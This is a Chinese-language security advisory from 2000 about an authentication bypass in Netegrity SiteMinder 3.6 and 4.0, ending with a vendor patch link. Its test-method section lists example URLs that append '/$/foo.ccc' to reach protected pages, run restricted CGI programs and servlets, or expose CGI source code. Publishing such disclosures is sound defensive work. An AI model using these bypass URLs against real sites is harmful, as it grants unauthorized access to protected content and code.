Netegrity SiteMinder 可以绕过其认证机制
发布日期:2000-09-15
更新日期:2000-09-15
受影响系统:
Netegrity SiteMinder 4.0
Netegrity SiteMinder 3.6
- Sun Solaris 2.x
- Microsoft Windows NT 4.0
描述:
Netegrity's SiteMinder 软件用来为服务器上的web页面提供访问控制。然而,通过提交一个
特殊的链接,一个未经认证的客户也可以获取对受保护内容的读或执行权限。
如果在链接后面增加字符串 '/$/nonexistantfile.ext',服务器就会不进行身份认证而直接处
理用户期望的请求。这个不存在文件的后缀可以是.ccc,.class,.jpg.
如果要访问的受限内容是cgi程序,其所要求的值可以在增加的字符串后面输入。如果不输入
要求的变量,服务器将返回CGI的源代码。
<*来源: @stake Inc. Security Advisory
http://www.atstake.com/research/advisories/2000/a091100-1.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1. 如果受限页面为:
http://www.mysite.com/cgi-bin/secrets.html
如果使用:
http://www.mysite.com/cgi-bin/secrets.html/$/foo.ccc
就可以看到secrets.html的内容。
2. 如果受限的CGI程序为:
http://www.mysite.com/cgi-bin/restricted.cgi
使用下列链接就可以执行这个程序:
http://www.mysite.com/cgi-bin/restricted.cgi$/foo.ccc?subject=blah
使用下列链接就可以察看这个程序源代码:
http://www.mysite.com/cgi-bin/restricted.cgi/$/foo.ccc
使用下列链接就可以执行一个servlet:
http://www.mysite.com/applets/restricted/$/foo.ccc?query=blah
建议:
厂商补丁:
netegrity已经提供了补丁程序:
http://www.netegrity.com/services/online/
浏览次数:7054
严重程度:0(网友投票)